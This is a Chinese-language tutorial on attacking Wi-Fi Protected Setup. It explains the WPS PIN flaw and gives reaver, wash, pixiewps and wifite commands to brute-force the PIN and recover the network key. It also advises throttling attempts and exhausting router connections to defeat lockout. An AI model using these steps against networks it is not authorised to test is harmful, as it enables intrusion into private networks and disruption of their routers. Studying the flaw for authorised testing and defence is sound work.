无线渗透_WPS攻击

2022年07月07日18:00:14 科技 1519

WPS(WIRELESS PROTECTED SETUP)

  • WPS是WIFI联盟2006年开发的一项技术
    • 通过PIN码来简化无线接入的操作,无需记住PSK
    • 路由器和网卡各按一个按钮就能接入无线
    • PIN码是分为前后各4位的2段共8位数字
  • 安全漏洞
    • PSK:218,340,105,854,896
    • 2011年被发现安全涉及漏洞
    • 接入发起方可以根据路由器的返回信息判断前4位是否正确
    • 而PIN码的后4位只有1000种定义的组合(最后一位是checksum
    • 所以全部穷举破解只需要11000次尝试
    • 标准本身没有设计锁定机制,目前多个厂商已实现锁定机制



  • 包括Linksys在内的很多厂家的无线路由器无法关闭WPS功能
  • 即使在WEB界面中有关闭WPS,配置也不会生效
  • 攻击难度相对较低,防御却十分困难
  • 一般可在4-10小时内爆破密码
    • PSK
  • 用计算机直接算出PIN
    • C83A35
    • 00B00C


实际流程

  • 启动侦听模式后,发现支持WPS的AP
  • wash -i wlan0mon
    #或者
    airodump-ng wlan0mon
    --wps

无线渗透_WPS攻击 - 天天要闻


  • 爆破PIN码
reaver -i wlan0mon -b <AP mac> -vv


无线渗透_WPS攻击 - 天天要闻



  • 秒破PIN码
reaver -i wlan0mon -b <AP mac> -vv -K 1

pixiewps

  • 只是使用固定厂商的芯片,成功率很低


  • 得到PIN码之后就可以继续破解
reaver -i wlan0mon -b <AP mac> -vv -p  [PIN码]


问题:

  • 很多厂家实现了锁定机制,所以爆破时应注意限速
  • 一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定


  • 综合自动化无线密码破解工具 wifite

无线渗透_WPS攻击 - 天天要闻


  • 按住CRTL+C输入编号即可进行攻击


无线渗透_WPS攻击 - 天天要闻



  • 等待之后就可以破解出来


无线渗透_WPS攻击 - 天天要闻

科技分类资讯推荐

微信右上角的加号,原来这么好用,隐藏着4个实用功能 - 天天要闻

微信右上角的加号,原来这么好用,隐藏着4个实用功能

微信右上角的加号原来这么好用,还隐藏着四个实用功能,真的是太好用了。在使用微信聊天的时候会发现在聊天页面右上角有一个加号,平常都知道打开之后可以扫一扫付款,也可以扫一扫添加好友。除了这几个用途之外,其实右上角的加号还隐藏着四个非常实用的小功
最后的幻觉:小米为何仍不肯离开印度? - 天天要闻

最后的幻觉:小米为何仍不肯离开印度?

撰文 泰坦在全球化与地缘政治交织的棋盘上,小米正在印度进行一场越来越艰难的“持久战”。面对印度政府的高压政策、巨额罚款和持续的技术围堵,小米的处境已形同“战略围困”。然而,令人疑惑的是,尽管盈利被严重压缩、市场份额下滑、前景黯淡,小米依然没
央视曝光:大众点评给刷好评开绿灯 - 天天要闻

央视曝光:大众点评给刷好评开绿灯

记者接到消费者反映,他们在网络平台上吐槽某商品不好用的差评帖,莫名其妙就消失了。并且发现在好多直播电商平台的差评区里,充斥的竟然都是各种好评和夸夸帖。究竟是谁,在互联网各大平台上操控舆情,兴风作浪呢?